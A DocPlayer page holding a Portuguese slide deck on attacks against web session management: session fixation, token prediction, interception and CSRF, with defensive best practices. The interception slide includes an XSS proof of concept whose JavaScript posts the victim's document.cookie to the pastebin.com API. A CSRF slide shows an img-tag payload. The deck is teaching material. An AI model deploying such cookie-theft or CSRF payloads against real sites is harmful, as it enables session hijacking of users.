Attacking Session Management



Documentos relacionados
Segurança em aplicações Web. Exemplos e Casos Práticos em

Desenvolvimento e disponibilização de Conteúdos para a Internet

Segurança em Sistemas Web. Addson A. Costa

Quem tem medo de XSS? William Costa

XSS - CROSS-SITE SCRIPTING

(In)Segurança em Aplicações Web. Marcelo Mendes Marinho Thiago Canozzo Lahr

Segurança em PHP. Exemplos e Casos Práticos

Boas Práticas de Desenvolvimento Seguro

Vulnerabilidades em Sistemas de Informação:

Gerência de Segurança

VULNERABILIDADES WEB v.2.2

Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner

Segurança no Plone. Fabiano Weimar dos Santos [Xiru]

Falha segurança Baco Cross-site scripting (XSS) e Logins por canal não seguro (http) perenboom@hmamail.com

Segurança em aplicações web: pequenas ideias, grandes resultados Prof. Alex Camargo

Para a prova de conceito utilizamos o kit de ferramentas do Backtrack 5 r3 (SET + ETTERCAP). Demostraremos a seguir o processo utilizado.

Análise de Vulnerabilidades em Aplicações WEB

Josh Pauli Revisão técnica Scott White. Novatec

Licenciamento Qlik Sense

O atacante pode roubar a sessão de um usuário legítimo do sistema, que esteja previamente autenticado e realizar operações que o mesmo poderia.

Cross-Site Scripting. Paulo Ricardo Lisboa de Almeida. 1 Universidade Positivo

Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Engineer douglas.pasqua@gmail.com

Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL):

Segurança de transações contra dois tipos de ataque

Projeto Arquitetural do IEmbedded

Indústria de Cartões de Pagamento (PCI) Padrão de segurança de dados. Resumo de Alterações da Versão 2.0 para a 3.0 do PCI-DSS

3 SERVIÇOS IP. 3.1 Serviços IP e alguns aspectos de segurança

Daniel Caçador

Segurança e privacidade na era da mobilidade: riscos e desafios. Aldo Albuquerque aldo@tempest.com.br

Fonte: - Illustration by Gaich Muramatsu

Políticas de segurança e informações

Pen-test de Aplicações Web: Técnicas e Ferramentas

Características: Switch Industrial Ethernet: Cisco Secure Agent: É isolado de todas as outras redes por um firewall ou por uma lista de acesso

Segurança Web com PHP 5

UNIP UNIVERSIDADE PAULISTA

Biblioteca de segurança para tratar as principais vulnerabilidades web

Migração do appliances Bluecoat para Ariel Cassins

Conviso Security Training Ementa dos Treinamentos

Nessus Vulnerability Scanner

CAMADA DE TRANSPORTE

JSF - Controle de Acesso FERNANDO FREITAS COSTA

GUIA DE CONFIGURAÇÃO AUTENTICAÇÃO DE REDES WIFI COM CAPTIVE PORTAL

O que é uma sessão. maneira de preservar dados através de acessos subsequentes.

SEGURANÇA EM APLICAÇÕES WEB PROF.: PAULO RICARDO LISBOA DE ALMEIDA

segurança em aplicações web

Segurança na Rede Local Redes de Computadores

FICHA DE ESPECIFICAÇÃO TÉCNICA PRODUTO PROCESSO DATA: 01/11/2013. PRODUTO: IcBox SUB-PRODUTO: DESCRIÇÃO: Diagnósticos através de um sniffer serial

GUIA PRÁTICO DE INSTALAÇÃO

ACESSO REMOTO EM NUVEM Guia Rápido

FACULDADE DE TÉCNOLOGIA SENAC SEGURANÇA DA INFORMAÇÃO

Análise de segurança em aplicativos bancários na plataforma Android RAFAEL J. CRUZ,

10 maiores riscos em aplicações Web

SEGURANÇA EM PROTOCOLO SIP

Manual de Configuração Wireless. Etec Alberto Santos Dumont. Guarujá

Políticas de Segurança de Sistemas

SERVIÇO NACIONAL DE APRENDIZAGEM COMERCIAL FACULDADE DE TECNOLOGIA SENAC PELOTAS

Segurança de Sistemas

Ambiente Virtual de Avaliações Utilizando Certificados Digitais. Fernando Gevard Acadêmico Paulo Fernando da Silva - Orientador

FTP Protocolo de Transferência de Arquivos

Política de Uso do JEMS para a CAFe

REDES DE COMPUTADORES E TELECOMUNICAÇÕES MÓDULO 16

Inicialização Rápida do Novell Vibe Mobile

Segurança em PHP. Edgar

Hackers. Seus dados podem ser inúteis, mas seu computador em si pode ainda ser um recurso valioso.

Ataques a Aplicações Web

FTP - Protocolo. O protocolo FTP é o serviço padrão da Internet para a transferência de arquivos entre computadores.

Aplicativos Android têm sérias vulnerabilidades SSL, dizem pesquisadores

PROJETO INTEGRADOR. 5º PERÍODO Gestão da Tecnologia da Informação Noturno

Manual marketing v

Web Application Firewall

Nova Prestech.net. Gerenciamento de Segurança da Informação com Software Livre. Consultoria e Soluções em Informática.

Firewall. Alunos: Hélio Cândido Andersson Sales

Verificação em duas etapas. <Nome> <Instituição> < >

Programação Orientada a Objetos com PHP & MySQL Cookies e Sessões. Prof. MSc. Hugo Souza

Descrição da atividade: elaborar um relatório sobre Prova de Conceito de ataque Man in the Middle (MITM) através do transbordamento da tabela MAC.

Auditoria e Segurança da Informação GSI536. Prof. Rodrigo Sanches Miani FACOM/UFU

Auditoria e Segurança de Sistemas Segurança de Redes de Computadores Adriano J. Holanda

Transcrição:

Attacking Session Management Alexandre Villas (alequimico) Janeiro de 2012

SUMÁRIO 1. Introdução 2. Classes de ataques ao gerenciamento de sessão 1. Session Fixation 2. Predição 3. Interceptação 4. Força Bruta 3. Conclusão

INTRODUÇÃO Devido ao papel chave desempenhado pelo mecanismo de gerenciamento de sessão, este é um dos principais alvos de ataques contra a aplicação. Se um atacante quebra o gerenciamento de sessão da aplicação, então ele pode efetivamente "bypassar" o sistema de autenticação se personificar um usuário válido da aplicação sem sequer conhecer suas credenciais. Se um atacante compromete a conta do administrador, então o atacante pode "ownar" a aplicação inteira.

SESSION FIXATION ATTACK http://online.worldbank.dom /login.jsp?sessionid=1234 online.worldbank.dom

BOAS PRÁTICAS... Certifique-se de que seu servidor não aceite tokens sugeridos pelo usuário. Evite XSS a todo custo. Troque o identificador de sessão após logar o usuário.

MITO COMUM Nós usamos smartcards para autenticação e as sessões dos usuários não podem ser comprometidas sem o uso deste dispositivo!

PREDIÇÃO - FRAQUEZAS NA GERAÇÃO DO TOKEN DE SESSÃO TOKENS SIGNIFICATIVOS

PREDIÇÃO - FRAQUEZAS NA GERAÇÃO DO TOKEN DE SESSÃO TOKENS NÃO SIGNIFICATIVOS

BOAS PRÁTICAS... Evite usar informações sensíveis dos usuários para compor o token. Busque geradores de tokens já consagrados pelo mercado.

INTERCEPTAÇÃO Capturando tokens

INTERCEPTAÇÃO Capturando tokens 1 O não uso do HTTPS. 2 Uso do HTTPS apenas no login. 3 Buracos no HTTPS durante o uso da aplicação. 4 HTTPS não forçado 5 A não mudança do token depois da autenticação. 6 Transmissão do token via GET 7 Não invalidação do token após logout/timeout

INTERCEPTAÇÃO Uso do XSS para Session Hijacking function a(){ var xhr = new XMLHttpRequest(); var params = 'paste_code=' + document.cookie + '&paste_name=xss_poc'; xhr.open("post","http://pastebin.com/api_public.php",true); xhr.setrequestheader("content-type","application/x-www-form-urlencoded"); xhr.setrequestheader("content-length",params.length + ""); xhr.setrequestheader("connection","close"); xhr.send(params); } a(); VIDEO

XSRF ou CSRF online.worldbank.dom Request Response with request to target <img src= http://online.worldbank.dom/app?logout&h >

BOAS PRÁTICAS... Usem o HTTPS e assegurem que este seja forçado e usado em toda a aplicação. Mudem o toquem após a autenticação. Nunca transmitam o token pelo método GET. Busquem que o timeout da sessão seja o mais curto possível e que este seja realmente invalidado com o logout ou no tempo. Utilize as flags SECURE e HTTPOnly nos tokens.

CONCLUSÃO A maioria das vulnerabilidades e ataques a sessão do usuário é de maior responsabilidade do desenvolvedor da aplicação do que do usuário em si. Busquem desenvolver suas aplicações Web da forma mais segura possível não tendo a visão da segurança como um mal necessário e sim como valor agregado e como diferencial de mercado em relação ao atual contexto.

BIBLIOGRAFIA 1 - Dafydd Stuttard & Marcus Pinto - The Web Application Hacker s Handbook Discovering and Exploiting Security Flaws 2 - Mitja Kolšek - Session Fixation Vulnerability in Web-based Applications 3 - William Zeller and Edward W. Felten - Cross-Site Request Forgeries: Exploitation and Prevention 4 - http://msujaws.wordpress.com/2011/02/17/xsssession-hijacking-proof-of-concept/

AGRADECIMENTOS Contato: alex.villas@gmail.com

2026 © DocPlayer.com.br Política de Privacidade | Termos de serviço | Feedback